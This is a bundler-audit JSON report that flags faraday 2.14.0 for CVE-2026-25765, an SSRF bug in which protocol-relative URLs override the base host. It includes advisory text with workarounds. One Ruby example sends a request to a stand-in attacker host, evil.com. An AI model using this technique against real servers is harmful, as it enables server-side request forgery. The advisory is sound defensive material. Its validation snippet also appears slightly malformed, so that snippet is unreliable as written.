{"version":"0.9.3","created_at":"2026-02-12 08:49:53 +0100","results":[{"type":"unpatched_gem","gem":{"name":"faraday","version":"2.14.0"},"advisory":{"path":"/home/wiseadvice/.local/share/ruby-advisory-db/gems/faraday/CVE-2026-25765.yml","id":"CVE-2026-25765","url":"https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2","title":"Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url","date":"2026-02-09","description":"### Impact\n\nFaraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)\nuses Ruby's `URI#merge` to combine the connection's base URL with\na user-supplied path. Per RFC 3986, protocol-relative URLs\n(e.g. `//evil.com/path`) are treated as network-path references\nthat override the base URL's host/authority component.\n\nThis means that if any application passes user-controlled input to\nFaraday's `get()`, `post()`, `build_url()`, or other request\nmethods, an attacker can supply a protocol-relative URL like\n`//attacker.com/endpoint` to redirect the request to an\narbitrary host, enabling Server-Side Request Forgery (SSRF).\n\nThe `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts\nURLs starting with `/`, so protocol-relative URLs bypass it entirely.\n\n**Example**\n```ruby\nconn = Faraday.new(url: 'https://api.internal.com')\nconn.get('//evil.com/steal')\n# Request is sent to https://evil.com/steal instead of api.internal.com\n```\n\n### Patches\n\nFaraday v2.14.1 is patched against this security issue. All\nversions of Faraday up to 2.14.0 are affected.\n\n### Workarounds\n\n**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action\nto mitigate this issue, however should that not be an option\nplease continue reading.**\n\nApplications should validate and sanitize any user-controlled\ninput before passing it to Faraday request methods.\nSpecifically:\n\n- Reject or strip input that starts with // followed by a\n  non-/ character.\n- Use an allowlist of permitted path prefixes.\n- Alternatively, prepend ./ to all user-supplied paths before\n  passing them to Faraday.\n\nExample validation:\n```ruby\ndef safe_path(user_input)\n  raise ArgumentError, \"Invalid path\" if user_input.match?(r{\\A//[^/]})\n   user_input\nend\n```\n","cvss_v2":null,"cvss_v3":5.8,"cve":"2026-25765","osvdb":null,"ghsa":"33mh-2634-fwr2","unaffected_versions":[],"patched_versions":[">= 2.14.1"],"criticality":"medium"}}]}